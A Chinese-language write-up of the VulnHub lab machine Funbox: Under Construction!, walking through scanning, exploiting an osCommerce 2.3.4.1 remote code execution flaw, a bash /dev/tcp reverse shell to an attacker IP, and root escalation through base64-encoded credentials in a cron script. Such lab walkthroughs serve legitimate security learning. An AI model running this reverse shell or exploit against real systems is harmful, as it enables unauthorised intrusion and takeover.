准备:

攻击机:虚拟机kali、本机win10。

靶机:Funbox: Under Construction!,下载地址:https://download.vulnhub.com/funbox/Funbox10.ova,下载后直接vbox打开即可。

知识点:osCommerce框架漏洞、pspy64查看定时任务、敏感信息泄露。

信息收集:

通过nmap扫描下网段内的存活主机地址,确定下靶机的地址:nmap -sn 172.20.10.0/24,获得靶机地址:172.20.10.6。

扫描下端口对应的服务:nmap -T4 -sV -p- -A 172.20.10.6,显示开放了22、25、80、110、143端口,开启了ssh服务、http服务、smtp服务、pop3服务、imap服务。

目录扫描:

使用dirsearch进行目录扫描,发现catalog目录和一些其他文件、目录信息。

WEB信息收集:

访问下web服务:http://172.20.10.6/,并检查其源代码信息,但是未发现有效信息。

访问下扫描出来的目录:http://172.20.10.6/catalog,发现框架信息:osCommerce,版本信息:v2.3.4.1。

那就使用searchsploit搜索下osCommerce框架v2.3.4.1版本的漏洞信息,发现以下命令执行漏洞。

漏洞获取shell:

查看下该exp的利用方式,发现其利用方式为:python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog。

进行shell反弹时发现不能使用单引号字符,否则会终止rec_shell,尝试改成双引号成功反弹shell,命令:bash -c "bash -i >& /dev/tcp/172.20.10.7/6688 0>&1"。

提权:

在当前目录下的configure.php.bak文件中发现一组账户和密码:jack/yellow,但是切换该账户或ssh连接该账户均是失败。

上传pspy64并执行该脚本(赋予执行权限:chmod +x pspy64),发现会执行:/bin/sh -c /usr/share/doc/examples/cron.sh。

查看下该文件信息,命令:cat /usr/share/doc/examples/cron.sh,发现base64加密的字符串:LXUgcm9vdCAtcCByZnZiZ3QhIQ==,对该字符串解密,成功获得root账户信息:root/rfvbgt!!。

但是建立新的ssh连接,仍是无法直接连接,应该是配置中禁止了使用ssh协议+密码进行登录,使用python升级下shell:python -c 'import pty; pty.spawn("/bin/bash")',然后切换root账户:su root,成功获得root权限。

获得root权限后,在/root目录下发现root.txt文件,读取该文件成功获取到flag值。

vulnhub靶场之FUNBOX: UNDER CONSTRUCTION!的更多相关文章

  1. Vulnhub靶场题解

    Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...

  2. VulnHub靶场学习_HA: ARMOUR

    HA: ARMOUR Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-armour,370/ 背景: Klaw从“复仇者联盟”超级秘密基地偷走了一些盔甲 ...

  3. VulnHub靶场学习_HA: InfinityStones

    HA-InfinityStones Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-infinity-stones,366/ 背景: 灭霸认为,如果他杀 ...

  4. VulnHub靶场学习_HA: Avengers Arsenal

    HA: Avengers Arsenal Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-avengers-arsenal,369/ 背景: 复仇者联盟 ...

  5. VulnHub靶场学习_HA: Chanakya

    HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...

  6. VulnHub靶场学习_HA: Pandavas

    HA: Pandavas Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-pandavas,487/ 背景: Pandavas are the warr ...

  7. VulnHub靶场学习_HA: Natraj

    HA: Natraj Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-natraj,489/ 背景: Nataraj is a dancing avat ...

  8. VulnHub靶场学习_HA: Chakravyuh

    HA: Chakravyuh Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chakravyuh,388/ 背景: Close your eyes a ...

  9. VulnHub靶场学习_HA:Forensics

    HA:Forensics Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-forensics,570/ 背景: HA: Forensics is an ...

  10. Vulnhub靶场——DC-1

    记一次Vulnhub靶场练习记录 靶机DC-1下载地址: 官方地址 https://download.vulnhub.com/dc/DC-1.zip 该靶场共有5个flag,下面我们一个一个寻找 打开 ...

随机推荐

  1. 1NF | 2NF | 3NF的区分以及什么是函数依赖、部分函数依赖、值传递依赖(最详细的讲解1NF、2NF、3NF的关系)

    1NF | 2NF | 3NF的区分以及什么是函数依赖.部分函数依赖.值传递依赖 符合3NF一定符合2NF.一定符合1IF 简单区分.2NF不存在部分函数依赖,3NF不存在传递函数依赖 第一范式1NF ...

  2. mybatis框架图

  3. 忘记了99乘法表啥样的了,python打印下看看

    for i in range(1,10): for j in range(1, i+1): if i == j: print(j, "x", i, "=", i ...

  4. 快读《ASP.NET Core技术内幕与项目实战》WebApi3.1:WebApi最佳实践

    本节内容,涉及到6.1-6.6(P155-182),以WebApi说明为主.主要NuGet包:无 一.创建WebApi的最佳实践,综合了RPC和Restful两种风格的特点 1 //定义Person类 ...

  5. Debian11管理员手册

    1 用户与群组数据库 用户清单通常保存在 /etc/passwd 文件内,把哈希编码后的密码保存在 /etc/shadow 文件内.这两个文件都是纯文本档,以简单的格式保存,可以用文本编辑器读取与修改 ...

  6. C#where关键字约束

    where关键字的用法 where关键词一个最重要的用法就是在泛型的声明.定义中做出约束. 约束又分为接口约束.基类约束.构造函数约束.函数方法的约束. 1.接口约束,泛型参数必须实现相应的接口才可以 ...

  7. python面试题常用语句

    一.比较与交换1.比较并输出大的 print(a if a>b else b) 2.交换两个元素 a,b = b,alist1[i],list[j]=list1[j],list[i] 二.排序 ...

  8. PHY驱动调试之 --- PHY控制器驱动(二)

    1. 前言 内核版本:linux 4.9.225,以freescale为例. 2. 概述 PHY芯片为OSI的最底层-物理层(Physical Layer),通过MII/GMII/RMII/SGMII ...

  9. virtual继承和不继承

    用virtual修饰的虚函数,用来继承重写,没有virtual修饰的,取决于父类 定义 父类 *x=new 子类 首先父类不能调用子类的函数,自能调用本身的函数,所以,只有两种情况,1.无virtua ...

  10. Zookeeper的服务器的log4j升级为log4j2的升级方案(忽略配置化兼容问题)

    参考在线markdown编辑器: http://marxi.co/ Zookeeper的服务器的log4j升级为log4j2的升级方案(忽略配置化兼容问题) 目前希望可以升级将Zookeeper中lo ...